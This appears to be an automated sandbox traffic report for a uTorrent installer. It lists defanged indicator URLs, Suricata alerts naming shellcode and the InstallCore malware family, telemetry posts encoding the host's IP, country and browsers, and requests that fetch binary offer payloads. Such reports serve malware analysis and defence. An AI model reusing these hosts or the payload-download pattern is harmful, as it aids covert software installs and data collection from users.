hxxp://com-utorrent-prod-bench-290894750.us-east-1.elb.amazonaws.com/e?i=50&e=eyJldmVudE5hbWUiOiJoeWRyYTEiLCJhY3Rpb24iOiJodGFiZWdpbiIsInBpZCI6IjI5NDQiLCJoIjoicjcwUkhTeU5XOE9UTnFMdSIsInYiOiIxMTEyNTgxNzIiLCJiIjo0MzU4MCwiY2wiOiJ1VG9ycmVudCIsImxuZyI6InJ1Iiwib3NhIjoiMzIiLCJzbG5nIjoiZW4iLCJkYiI6IldpbmRvd3MgSW50ZXJuZXQgRXhwbG9yZXIiLCJkYnYiOiI5LjAiLCJpYnIiOlt7Im5hbWUiOiJGaXJlZm94IiwidmVyc2lvbiI6IjQ5LjAiLCJleGVOYW1lIjoiZmlyZWZveCJ9LHsibmFtZSI6Ikdvb2dsZSBDaHJvbWUiLCJ2ZXJzaW9uIjoiNTQuMCIsImV4ZU5hbWUiOiJjaHJvbWUifSx7Im5hbWUiOiJXaW5kb3dzIEludGVybmV0IEV4cGxvcmVyIiwidmVyc2lvbiI6IjkuMCIsImV4ZU5hbWUiOiJpZXhwbG9yZSJ9XSwiaXAiOiIxOTQuMjQyLjk2LjIxOCIsImNuIjoiVWtyYWluZSIsInBhY2tpZCI6InJ1X3lhbmRleF9pcyJ9
hxxp://rp.robotitor.com/?v=2.0&subver=6.21&pcrc=391853196	52.213.197.187
hxxp://rp.robotitor.com/?v=2.0&subver=6.21&pcrc=1504424460	52.213.197.187
hxxp://rp.robotitor.com/?v=2.0&subver=6.21&pcrc=1961982617	52.213.197.187
hxxp://img.robotitor.com/img/Pipupimiwad/fs_bg.png	146.185.27.53
hxxp://img.robotitor.com/img/Rawabere/FS/bg_test_B.png	146.185.27.53
hxxp://rp.robotitor.com/?v=2.0&subver=6.21&pcrc=303144880	52.213.197.187
hxxp://rp.robotitor.com/?v=2.0&subver=6.21&pcrc=1692931391	52.213.197.187
hxxp://img.robotitor.com/img/Tavasat/15Feb17/v1_fs/EN.png	146.185.27.53
hxxp://cdneu.robotitor.com/ofr/Solululadul/asgnd.cis	95.211.184.67
hxxp://cdneu.robotitor.com/ofr/Solululadul/icc_v5_8.cis	95.211.184.67
hxxp://img.robotitor.com/img/Repererarer/RS_RA_V1_FS.png	146.185.27.53
hxxp://img.robotitor.com/img/Repererarer/RS_RA_V2_M_WIN.png	146.185.27.53
hxxp://rp.robotitor.com/?v=2.0&subver=6.21&pcrc=334261017	52.213.197.187
hxxp://rp.robotitor.com/?v=2.0&subver=6.21&pcrc=469500041	52.213.197.187
hxxp://img.robotitor.com/img/Repererarer/ADBlock_icon.png	146.185.27.53
hxxp://rp.robotitor.com/?v=2.0&subver=6.21&pcrc=1429957044	52.213.197.187
hxxp://rp.robotitor.com/?v=2.0&subver=6.21&pcrc=1203213041	52.213.197.187
hxxp://img.robotitor.com/img/Repererarer/Battery_icon.png	146.185.27.53
hxxp://img.robotitor.com/img/Repererarer/Video_icon.png	146.185.27.53
hxxp://img.robotitor.com/img/Repererarer/VPN_icon.png	146.185.27.53
hxxp://cdnus.robotitor.com/ofr/Solululadul/asgnd.cis	50.115.122.45
hxxp://cdnus.robotitor.com/ofr/Solululadul/icc_v5_8.cis	50.115.122.45
hxxp://rp.robotitor.com/?v=2.0&subver=6.21&pcrc=384229237	52.213.197.187
hxxp://download-lb.utorrent.com/endpoint/hydra-ut/os/win7/track/stable/browser/ie/os-region/US/os-lang/en/os-ver/6.1/enc-ver/111258172/	67.215.238.66
hxxp://i-50.b-000.xyz.bench.utorrent.com/e?i=50&e=eyJldmVudE5hbWUiOiJoeWRyYTEiLCJhY3Rpb24iOiJodGFiZWdpbiIsInBpZCI6IjI5NDQiLCJoIjoicjcwUkhTeU5XOE9UTnFMdSIsInYiOiIxMTEyNTgxNzIiLCJiIjo0MzU4MCwiY2wiOiJ1VG9ycmVudCIsImxuZyI6InJ1Iiwib3NhIjoiMzIiLCJzbG5nIjoiZW4iLCJkYiI6IldpbmRvd3MgSW50ZXJuZXQgRXhwbG9yZXIiLCJkYnYiOiI5LjAiLCJpYnIiOlt7Im5hbWUiOiJGaXJlZm94IiwidmVyc2lvbiI6IjQ5LjAiLCJleGVOYW1lIjoiZmlyZWZveCJ9LHsibmFtZSI6Ikdvb2dsZSBDaHJvbWUiLCJ2ZXJzaW9uIjoiNTQuMCIsImV4ZU5hbWUiOiJjaHJvbWUifSx7Im5hbWUiOiJXaW5kb3dzIEludGVybmV0IEV4cGxvcmVyIiwidmVyc2lvbiI6IjkuMCIsImV4ZU5hbWUiOiJpZXhwbG9yZSJ9XSwiaXAiOiIxOTQuMjQyLjk2LjIxOCIsImNuIjoiVWtyYWluZSIsInBhY2tpZCI6InJ1X3lhbmRleF9pcyJ9	107.20.217.71
hxxp://i-50.b-000.xyz.bench.utorrent.com/e?i=50&e=eyJldmVudE5hbWUiOiJoeWRyYTEiLCJhY3Rpb24iOiJvZmZlciIsInBpZCI6IjI5NDQiLCJoIjoicjcwUkhTeU5XOE9UTnFMdSIsInYiOiIxMTEyNTgxNzIiLCJiIjo0MzU4MCwiY2wiOiJ1VG9ycmVudCIsImxuZyI6InJ1Iiwib3NhIjoiMzIiLCJzbG5nIjoiZW4iLCJkYiI6IldpbmRvd3MgSW50ZXJuZXQgRXhwbG9yZXIiLCJkYnYiOiI5LjAiLCJpYnIiOlt7Im5hbWUiOiJGaXJlZm94IiwidmVyc2lvbiI6IjQ5LjAiLCJleGVOYW1lIjoiZmlyZWZveCJ9LHsibmFtZSI6Ikdvb2dsZSBDaHJvbWUiLCJ2ZXJzaW9uIjoiNTQuMCIsImV4ZU5hbWUiOiJjaHJvbWUifSx7Im5hbWUiOiJXaW5kb3dzIEludGVybmV0IEV4cGxvcmVyIiwidmVyc2lvbiI6IjkuMCIsImV4ZU5hbWUiOiJpZXhwbG9yZSJ9XSwib2ZmZXJ0eXBlIjoicHJpbWFyeSIsInByb3ZpZGVyIjoiSXJvblNyYyIsImhvd21hbnkiOjEsIm9mZmVyc2hvd24iOjAsInN0YXR1cyI6ImxvYWRfRExMX3N1Y2NlZWQiLCJpcm9uc3JjX29mZmVyX3ZlcnNpb24iOiIxLjAifQ==	107.20.217.71
hxxp://i-50.b-000.xyz.bench.utorrent.com/e?i=50	107.20.217.71
router.utorrent.com	82.221.103.244
lapatate.ddns.net	91.160.77.49
router.bittorrent.com	67.215.246.10

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET MALWARE Win32/InstallCore Initial Install Activity 1
ET POLICY External IP Lookup ip-api.com

Traffic

GET /img/Pipupimiwad/fs_bg.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: img.robotitor.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.10

Date: Thu, 27 Jul 2017 04:34:47 GMT

Content-Type: image/png

Connection: keep-alive

x-amz-id-2: Yj6Gzj3vFq32zne 1m5Wnyv3GhhIALqU1N/E18e2cYt1/wIC3xfdFvnB3/fZZmqIUaM4oesimag=

x-amz-request-id: 92A136953038DC09

Last-Modified: Tue, 14 Mar 2017 14:39:55 GMT

ETag: "f99f4215b5828f50aa09a4b231c992e5"

x-amz-meta-cb-modifiedtime: Mon, 27 Jun 2016 13:05:01 GMT

x-amz-version-id: jFptmCTTvh4Xao9YuhsxAEAuX4FfvtgT

Content-Length: 10681

Accept-Ranges: bytes
.PNG........IHDR..............u......sBIT....|.d... .IDATx...y|T..?...
.;3.7......ln.Z..w..,...\.R..>...*.....V}j...u.F..\..Vq.x@..P.;..u.
Y.=.?&.L. .....~......{.....s....DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD.9..
j...U.2,.,..B.C.6l[.....P...O<.ND.x......8..~Sk3..oSCuu....kY....Q.
.'....[.e[...o.G...&..lv..5#ss..9..Pw....Qo......U..!.....cMC...3...t.
.R.R......m#....`0...|........@(.uMM.{..z.../...C"""......m....>...
..'....a.P. .....pY......y...x..........LDD.^...........x...........3#
.0.Wz.......x.....7._U%.i.p?. .C...N.....s.. 4..0m.K...;..N.|....~.6,.
.o.Y.b...7..{..B.t....~..m..}....j...mo..~.%.....O6tu.DDt`:....C.u..e#
.~'.|..".!...|.q.....x........N....h..sd*..sS....(;Y[{....y...9A.7.TV.
 .|.....G.q[..%........9.. %.....x<;...3g...R...3.c6...9v.p........
%0|.G.Y.b..[.h..3.t...|m.._.dI...w..EN..=......v'.b.#66.ZT....c&..@...
N.[Y.>..lW.^d...............Y.`AG...n.B.....~.......Cuf....:....6.T
..a.B...a.].`.m.C ....1.w. .....-.a.HN.........n..>.."h.q......T.0}
.t.r.o......]..v.%%%..@..Q....A...6....Vr..~[[rr.[.....\.&O..@...'_}.#
.z.0...4.h.s....s.....E..J........s....;o. ..,. h..V..}]II..v...s.[K$,
e.......L.. r..p}l....:Rn..."..3....k.,.....i.q..v....OM:u...Q.N...R..
....."..r.a..L%p.....s.X.G.!..#.....B.... );..p..../-=s...bCk....a....
.X.L.<...h.Rb..../8.R......../}.......r.....@.< .E.f.zl..%.s...T
CN.Zo.C..4..0k..j..u?).9f\..1.>.){...S../..j...._..m.w...-......[P.
.........~.J.}$.wR....8..w(....]L}84|Z..".Ou..:...r...y<.u........Q
.w....V.V.,^..&.....'b.5.{.~a..I.................K..Z.`.Y... .:m..
<<< skipped >>>

GET /img/Tavasat/15Feb17/v1_fs/EN.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: img.robotitor.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.10

Date: Thu, 27 Jul 2017 04:34:47 GMT

Content-Type: image/png

Connection: keep-alive

x-amz-id-2: vKX/FvrsnTdYgQfcoM0rxU SnxKdC/nvP93UkYsdqzV8F JMyHIP1Z5QxC71RNusmUljGKfBpc0=

x-amz-request-id: 54B5DAB402755519

Last-Modified: Sun, 19 Feb 2017 16:53:33 GMT

ETag: "c5ba68eff9f6d46f3a4b5676a129fbf5"

x-amz-meta-cb-modifiedtime: Thu, 09 Feb 2017 13:17:54 GMT

x-amz-version-id: 5siYo6NUIJ7JPw4lZdISqbPwj4b.NXB5

Content-Length: 17086

Accept-Ranges: bytes
.PNG........IHDR...............G.....PLTE-6Le4.8BY-6L-6Le4.8BY......*3
I..K.|..7L)5M#-D..8&/F...09O..1.....Y(1Hb0.7AW *A3<R.~..$<6?T.z.
.v...4....u..'>..;sx.....v..r..x..i..p.....`..........<EXg3....M
TfW]n.U....bhx\cshn}......^ ...........{....nt..........RYk...AI\3CQ..
..c.y~.EL_Y%.IQc($............\....L.................F......b./S...../
k4.qG5._.<9J.Q.*)...;.S..M.& }..NR...p.kA1.n..O......_...#.u...l>
;...d.F.........q.O6..$..(...`D?...../........l#2PxN...$.......\$...i9
....N?E~X..j.Z,.......a5...T.\..R0.f...1...>>d.......y.a/.[5.U8.
..}.f................pF.24...(.9..q..*Y...._...D.Y0...N:...M...H>w.
.....~E...B..2....n;.w....F...{Y.n..e....#.W.Y....V .B<nc=V.....5^/
(.P......m.J..b..xM..G4 ~..w.[)......rm.L#.5 a..U.......{.......``....
.gj.y?..VR1M\M.c_...K.=......8.K...>......4 H...>A....X#.5...Z{.
D._....i.....tRNS......."..?iIDATx......0...O:...........a..&8Np..8.q.
.......'8Np..8.q........'8Np..8.q........'8Np..8.q..>....8.......b.
n..o7....3.ihJ.X...GJm)m..N)L..`.Y......=z..."x..../s.......x.y..8....
.....a.....y.....}3...5....\/._s....DuS.e.eY.c.$Q.........&..........Z
...#.3...(..3...5.E.{...t$H....@>.N{.7i~S._q..N.0]........?e?.y...O
$.h......8./.;..}..g...I.....q..TU.....<G....oT*.._.%.]..s..D.P).._
~.\F..8......ITLK. d3."..E%A$.P..q.1%.Q..h.,.Ne.qr.K.W....g*._..n.`...
..........n|t.....0...Z.G.,(.........y.........8<...x.q....^.:....H
&. ..q.. ..[.........y......z.....w....._},^&...pY.....~!n...h.......`
.q1..=;!.6..S..Z....!A....pQ....>.}......?....=...t......./....
<<< skipped >>>

GET /img/Repererarer/RS_RA_V2_M_WIN.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: img.robotitor.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.10

Date: Thu, 27 Jul 2017 04:34:47 GMT

Content-Type: image/png

Connection: keep-alive

x-amz-id-2: PHGr1E i og2EMfo5t5nFOiumvDMak6Zl4526X4m7jTgUnitGktJXY83LoRX7w6t

x-amz-request-id: 4B07D4183A7187E9

Last-Modified: Thu, 22 Sep 2016 08:20:19 GMT

ETag: "1043cdf32bdd7bfcd5ab9b56a3fe614d"

x-amz-meta-cb-modifiedtime: Thu, 22 Sep 2016 07:05:00 GMT

x-amz-version-id: E4AZtgHGtXrKFXRuUSxmwFST9WebiAkG

Content-Length: 89843

Accept-Ranges: bytes
.PNG........IHDR...0.........6..I....tEXtSoftware.Adobe ImageReadyq.e&
lt;..^.IDATx.....dWu.....n...V K(."c..~.....&.........x..03.=l..~3f@."
...6..A.V....jI(..9...*....o.}.NU.V.V@.9...V.9.NUW......-EE.QD.E..4...
..\|..v..Ny.......|.....'....(.I...N.T)$o.zr..Q.\.h....;....Pz|...i..C
...I......I.....;{....Rrd..  ]o....z.....{..$..Z....iMA.E....>...T.
O>......-..H...Z...D}\o.G...M.9A~.Q<Y..U8....k..IbJ}..%r;=....Du
r(.=R......{....Z...2.z...9W.:GI.B........yI..._..x..*......R......xs.
....... |\.......Ovo...>US....}3|4...y....)......5..>.g...lxgE.Q
D.E..4...W*.}'....d....^..$..1...<.?..J..*d..\...?..6..*..J.0....#.
.:....(..5CH...h9.....MJp.,....<...."..D.....F..5..I...W../K=....\.
........x...ys.B.f00..]..5..S{.....|}rnm6<.8......n..R.#...7;.6.w..
T...=....y.~..cx..T#...SD.E.Q..&...j...u.....]....`.:.}g....Sp.../Xb..
I......,...M.n.@....t.....@..g.w.f.............dp.j........!.1...L....
.k..2 y..dXb^...Oi.....u7..(.1|.....GTZ.Q..."s.`..3..|.x..p.}*~....].}
.)$..hq....]..|..%..$UeJ(..3...n.u.....?..x._.. ...%9'....~..T9.zx..f@
..l.&..._;.........,j.h.. .3D.5H.$|...../....`.(..".x.E..{.....<..s
.(e..$.......:..{..53..LQ|.(.R@.3/.,..D..D{.Jv.....T.Lj.Ji.-%.........
..-t.k.....E...A.L...k.......w...r.@.Pof.....dP...).....VjM.Pb..a.....
E.H.#5...D..u.}......bF..Ly'...... aX.P....Q....04...>_..l.....vP2R
...........%..A..W.......Rb.C..\..~.qr|..D. ;dn......s.}8rfe.F...`L.0E
.QD.E<....*S...4....f. .......,..3.NOP. ..]...s.]....K|..Y..^.s....
V.....t{...O..C......s...t..]....R..q*OVI.;.t....D...2..y..h_....`
<<< skipped >>>

POST /e?i=50 HTTP/1.1

Host: i-50.b-000.xyz.bench.utorrent.com

User-Agent: Hydra HttpRequest

Connection: close

Content-Length: 248

{"eventName":"hydra1","action":"packDownloadStarted","type":"i","cau":"0","pv":"","cc":"0","bkt1":"0","ssb":"1","v":"111258172","cl":"uTorrent","osv":"6.1","l":"en","pid":"2944","h":"r70RHSyNW8OTNqLu","sid":"r70RHSyNW8OTNqLu1501130078","order":"1"}
HTTP/1.1 200 OK

Content-Type: text/html

Date: Thu, 27 Jul 2017 04:34:33 GMT

Server: nginx

X-Powered-By: PHP/5.4.30

Content-Length: 21

Connection: Close
{"response_code":200}..

POST /e?i=50 HTTP/1.1

Host: i-50.b-000.xyz.bench.utorrent.com

User-Agent: Hydra HttpRequest

Connection: close

Content-Length: 260

{"eventName":"hydra1","action":"packDownloadResult","type":"i","result":"1","cau":"0","pv":"","cc":"0","bkt1":"0","ssb":"4","v":"111258172","cl":"uTorrent","osv":"6.1","l":"en","pid":"2944","h":"r70RHSyNW8OTNqLu","sid":"r70RHSyNW8OTNqLu1501130078","order":"2"}
HTTP/1.1 200 OK

Content-Type: text/html

Date: Thu, 27 Jul 2017 04:34:42 GMT

Server: nginx

X-Powered-By: PHP/5.4.30

Content-Length: 21

Connection: Close
{"response_code":200}..

GET /ofr/Solululadul/asgnd.cis HTTP/1.1

Range: bytes=0-101028

Accept: */*

Host: cdnus.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Server: nginx/1.10.2

Date: Thu, 27 Jul 2017 04:34:48 GMT

Content-Type: application/octet-stream

Content-Length: 101029

Connection: keep-alive

x-amz-id-2: Lt51JiSIBiCMerte zC4brdSsKJKOAlLPsGb/D2qGi9Tsz4ieKTJ5T8TylLY3K2wyXNAkSaZof8=

x-amz-request-id: 5AEF623204478201

Last-Modified: Wed, 20 Jan 2016 14:38:52 GMT

ETag: "638ebcd93f900c3908f5dde6d8bc2d9f"

x-amz-meta-cb-modifiedtime: Wed, 20 Jan 2016 14:37:36 GMT

x-amz-version-id: ak82ScyXtEXeOWL8crBo3MgwwdwO6r.3

Content-Range: bytes 0-101028/101029
CIS................?...............P..............M.U....$..q.X]....9u
..9u...#a!.s..2.....{8.u..i3.\...Q.....X..}.E..c.).........&`.......B&
gt;Zr..|...E....=..>.o.u..........=|....:._-@.6.d.b.......F'/.C^..t
...e%.s^.3..4..&..o)Y....UrU.R@.........i.%?...lW.-..g.'..KC...'..0E.m
.d.....x.#]...y..u...?.x.V[....o5.x..MQ\....nX.@.9r..iJ.8...L.E...c.4.
.6.x..@'..[..C(4.&.../A..i........e...`T..H. ........)....9(!.D..m...0
..e.,...~..<. ..L.}...................../...sC..#..}.... .......9.9
.....Ji..Xb.Yjk.../...6.@b...i..&....F....M..a....u..B..~_2....h.:nu..
..-..QiL.P|.LB.).....X..v5Z.$aP.".*...z.b5J..z....h.a>?n~h.$..;.V.'
i...2......Y..q^Z4..\....=`....o.M....~.....:u..^.....A@......k..b...Z
<.!..;......&y..!4...#..S.p;wb....@a...._.......At.5..pz........t.5
H.. 8.-..7...{.P.a;..ia..@.Ac.1.....T...,dmoE's;....5...B.7.vQ$9......
y{.j...F....|...9.u....M......1./.-t....dI#d..C9..Lg...../. .v.......1
T..60.2........#..B..............8.....y#~5A...~t...K...{a.|.z....~.*.
.b*.49k.2....>..]s...W...B.n....zK.,..Vk.....h...........w...".....
.I..XW[..}W...y0f..k.~..O6.97#Gk8.5(....Y.W..k...Lz....6fz.....)|.}../
h(8....0dzx.\........._..b...'..Y..w/*H..\.B...\.......1&..Vg..[..N(.Z
I.......G..[.x....0:.eJ.J~..)o..,....T...i..Z.Q......P!.J......_...F.1
er.8...#d...).......Z..im..F.i....%".o.....F.z.V..Q..K....R..W ./.".E.
.dR...y......'Tu....9U..$4."..wP...d9.....x$...W`....8....#u...1..\,.S
.:.kdU..[...,.a"....". P....!.V.K.Q"M.G.e....w!C..../..... m9J1..&I..z
&.2.I..-B.......{.=Ftm....6....A...3..=@t..67.-M.U.Z/..c..^W/Wo .h
<<< skipped >>>

HEAD /ofr/Solululadul/asgnd.cis HTTP/1.1

Accept: */*

Host: cdneu.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)

Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.10.2

Date: Thu, 27 Jul 2017 04:34:47 GMT

Content-Type: application/octet-stream

Content-Length: 101029

Connection: keep-alive

x-amz-id-2: KK vdXgEg ZG7k9HbnVnEvw1vTxXFzEPzzlHuYKJr6 sgcCd0o1Xe1Vr7MRhP9oTuJDSc8ooCDI=

x-amz-request-id: F94435C213B88427

Last-Modified: Wed, 20 Jan 2016 14:38:52 GMT

ETag: "638ebcd93f900c3908f5dde6d8bc2d9f"

x-amz-meta-cb-modifiedtime: Wed, 20 Jan 2016 14:37:36 GMT

x-amz-version-id: ak82ScyXtEXeOWL8crBo3MgwwdwO6r.3

Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: nginx/1.10.2..Date: Thu, 27 Jul 2017 04:34:47
 GMT..Content-Type: application/octet-stream..Content-Length: 101029..
Connection: keep-alive..x-amz-id-2: KK vdXgEg ZG7k9HbnVnEvw1vTxXFzEPzz
lHuYKJr6 sgcCd0o1Xe1Vr7MRhP9oTuJDSc8ooCDI=..x-amz-request-id: F94435C2
13B88427..Last-Modified: Wed, 20 Jan 2016 14:38:52 GMT..ETag: "638ebcd
93f900c3908f5dde6d8bc2d9f"..x-amz-meta-cb-modifiedtime: Wed, 20 Jan 20
16 14:37:36 GMT..x-amz-version-id: ak82ScyXtEXeOWL8crBo3MgwwdwO6r.3..A
ccept-Ranges: bytes......


GET /ofr/Solululadul/asgnd.cis HTTP/1.1

Range: bytes=0-101028

Accept: */*

Host: cdneu.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Server: nginx/1.10.2

Date: Thu, 27 Jul 2017 04:34:48 GMT

Content-Type: application/octet-stream

Content-Length: 101029

Connection: keep-alive

x-amz-id-2: KK vdXgEg ZG7k9HbnVnEvw1vTxXFzEPzzlHuYKJr6 sgcCd0o1Xe1Vr7MRhP9oTuJDSc8ooCDI=

x-amz-request-id: F94435C213B88427

Last-Modified: Wed, 20 Jan 2016 14:38:52 GMT

ETag: "638ebcd93f900c3908f5dde6d8bc2d9f"

x-amz-meta-cb-modifiedtime: Wed, 20 Jan 2016 14:37:36 GMT

x-amz-version-id: ak82ScyXtEXeOWL8crBo3MgwwdwO6r.3

Content-Range: bytes 0-101028/101029
CIS................?...............P..............M.U....$..q.X]....9u
..9u...#a!.s..2.....{8.u..i3.\...Q.....X..}.E..c.).........&`.......B&
gt;Zr..|...E....=..>.o.u..........=|....:._-@.6.d.b.......F'/.C^..t
...e%.s^.3..4..&..o)Y....UrU.R@.........i.%?...lW.-..g.'..KC...'..0E.m
.d.....x.#]...y..u...?.x.V[....o5.x..MQ\....nX.@.9r..iJ.8...L.E...c.4.
.6.x..@'..[..C(4.&.../A..i........e...`T..H. ........)....9(!.D..m...0
..e.,...~..<. ..L.}...................../...sC..#..}.... .......9.9
.....Ji..Xb.Yjk.../...6.@b...i..&....F....M..a....u..B..~_2....h.:nu..
..-..QiL.P|.LB.).....X..v5Z.$aP.".*...z.b5J..z....h.a>?n~h.$..;.V.'
i...2......Y..q^Z4..\....=`....o.M....~.....:u..^.....A@......k..b...Z
<.!..;......&y..!4...#..S.p;wb....@a...._.......At.5..pz........t.5
H.. 8.-..7...{.P.a;..ia..@.Ac.1.....T...,dmoE's;....5...B.7.vQ$9......
y{.j...F....|...9.u....M......1./.-t....dI#d..C9..Lg...../. .v.......1
T..60.2........#..B..............8.....y#~5A...~t...K...{a.|.z....~.*.
.b*.49k.2....>..]s...W...B.n....zK.,..Vk.....h...........w...".....
.I..XW[..}W...y0f..k.~..O6.97#Gk8.5(....Y.W..k...Lz....6fz.....)|.}../
h(8....0dzx.\........._..b...'..Y..w/*H..\.B...\.......1&..Vg..[..N(.Z
I.......G..[.x....0:.eJ.J~..)o..,....T...i..Z.Q......P!.J......_...F.1
er.8...#d...).......Z..im..F.i....%".o.....F.z.V..Q..K....R..W ./.".E.
.dR...y......'Tu....9U..$4."..wP...d9.....x$...W`....8....#u...1..\,.S
.:.kdU..[...,.a"....". P....!.V.K.Q"M.G.e....w!C..../..... m9J1..&I..z
&.2.I..-B.......{.=Ftm....6....A...3..=@t..67.-M.U.Z/..c..^W/Wo .h
<<< skipped >>>

POST /e?i=50 HTTP/1.1

Host: i-50.b-000.xyz.bench.utorrent.com

User-Agent: Hydra HttpRequest

Connection: close

Content-Length: 269

{"eventName":"hydra1","action":"INFO","type":"i","res":"1276x846","cts":"1501130081","pv":"","cau":"0","cc":"0","bkt1":"0","ssb":"4","v":"111258172","cl":"uTorrent","osv":"6.1","l":"en","pid":"2944","h":"r70RHSyNW8OTNqLu","sid":"r70RHSyNW8OTNqLu1501130078","order":"3"}
HTTP/1.1 200 OK

Content-Type: text/html

Date: Thu, 27 Jul 2017 04:34:41 GMT

Server: nginx

X-Powered-By: PHP/5.4.30

Content-Length: 21

Connection: Close
{"response_code":200}..

HEAD /ofr/Solululadul/icc_v5_8.cis HTTP/1.1

Accept: */*

Host: cdneu.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)

Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.10.2

Date: Thu, 27 Jul 2017 04:34:47 GMT

Content-Type: application/octet-stream

Content-Length: 506658

Connection: keep-alive

x-amz-id-2: Et06U6nOIo8pJqsS57uCyHtylwDCyfYR9FHL2rOoQCnQx7C mBgoQGmlzdTQ0dH5W9dwuQ6 IoE=

x-amz-request-id: 3238093752B99AB8

Last-Modified: Mon, 05 Jun 2017 11:20:09 GMT

ETag: "d3275dae3b2da9508907b2e97cd72712"

x-amz-meta-cb-modifiedtime: Sun, 04 Jun 2017 11:47:23 GMT

x-amz-version-id: B1J2nyfjCWzZziCw.awfI7I4ql6woVzG

Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: nginx/1.10.2..Date: Thu, 27 Jul 2017 04:34:47
 GMT..Content-Type: application/octet-stream..Content-Length: 506658..
Connection: keep-alive..x-amz-id-2: Et06U6nOIo8pJqsS57uCyHtylwDCyfYR9F
HL2rOoQCnQx7C mBgoQGmlzdTQ0dH5W9dwuQ6 IoE=..x-amz-request-id: 32380937
52B99AB8..Last-Modified: Mon, 05 Jun 2017 11:20:09 GMT..ETag: "d3275da
e3b2da9508907b2e97cd72712"..x-amz-meta-cb-modifiedtime: Sun, 04 Jun 20
17 11:47:23 GMT..x-amz-version-id: B1J2nyfjCWzZziCw.awfI7I4ql6woVzG..A
ccept-Ranges: bytes......


GET /ofr/Solululadul/icc_v5_8.cis HTTP/1.1

Range: bytes=204800-506657

Accept: */*

Host: cdneu.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Server: nginx/1.10.2

Date: Thu, 27 Jul 2017 04:34:48 GMT

Content-Type: application/octet-stream

Content-Length: 301858

Connection: keep-alive

x-amz-id-2: Et06U6nOIo8pJqsS57uCyHtylwDCyfYR9FHL2rOoQCnQx7C mBgoQGmlzdTQ0dH5W9dwuQ6 IoE=

x-amz-request-id: 3238093752B99AB8

Last-Modified: Mon, 05 Jun 2017 11:20:09 GMT

ETag: "d3275dae3b2da9508907b2e97cd72712"

x-amz-meta-cb-modifiedtime: Sun, 04 Jun 2017 11:47:23 GMT

x-amz-version-id: B1J2nyfjCWzZziCw.awfI7I4ql6woVzG

Content-Range: bytes 204800-506657/506658
n.e..k.>{.5..x.)1..M(.P]D....m.\_..v)x*gE.\.M..[.a.B.W.[.....C .;c.
F..n..n%.j.t....[.....\.s.O.....a.N4x.].....Gtb.\H ..F....U....xLX...X
`..4....D.1....e......t.....'..G...9m..Eu. .2..}..i4..0ur?4......4...#
.....S..h;...]#(.$...e.9D')bo.K..G.....Mr....(...Gq.....bn>lC......
..`..b#...}T.k5BY.......Zx..$o..N-.F....&..s.d.....2p.].>.L..il....
8.d.9.}..a*..E.A.......T"...]Z.*h.(.........6kf..^....HV>..(Z.G)W..
.Nz..8....F.mGo....v.`..a..D[`..I?.D..........l.D.T..m."2.V.p........;
..Z......&[$.....9......p.XB~....Y.}\..a'2.x....^i..[.0l.^6q...F:...c.
v:.....L.?...&.v..@..qW..[..5...:m8z..S.........g#.;M.%".w?..Q..-....c
.2 ..g3..r.....@_...D..c8...fw......*....1{0.....o....R ..I.....5<.
...J.`.....Mj.g....j........:.b%Y=..8..k.K.....tf.......3>J.Z...Ow.
.V..e...... .e...RB...n....x.`.8..WY.;..>e.w.y............5~f...>
;...y.@S.T:.%#......../....R.s.\\...p..g.....O...f.4 s.....@S.....6.C.
..;N.88.....p.&.I.M..'...>&...0;......<._..|e......\r:...<o.c
...P@m/%..;....^7.GR...(....(t%..^/...... Vg...........q=2L...htm.....
...Q.a%....os.L...{d...C....s.-PE.,i}....bEG...R..P."7....>.V.yi..H
..x.z.S1....e.DQm...B..h..:. 2g....H....*.~nz.hm.-..^...y.."7.........
u.....%.'..3..A,.x......>.#.SD6..]P......C...q]....qs.|P.K=........
!..!d...U2.W$.'V3 F...\......#.a....M..E....o\.H...m/...A...h.^._,.J.5
a........C5<._..#I.^.o.[RXu...z..[.-H/ $.J.I....s7l..\Y|..G......6N
h.7..IQQ\...K..._..[$..<....;b...R.L....6.f&..!........sP(...0.....
=D9 .C?.#*....8W.t6\r.,.......-...DA.81.Z'.)0...uB.. ...s<..R.v
<<< skipped >>>

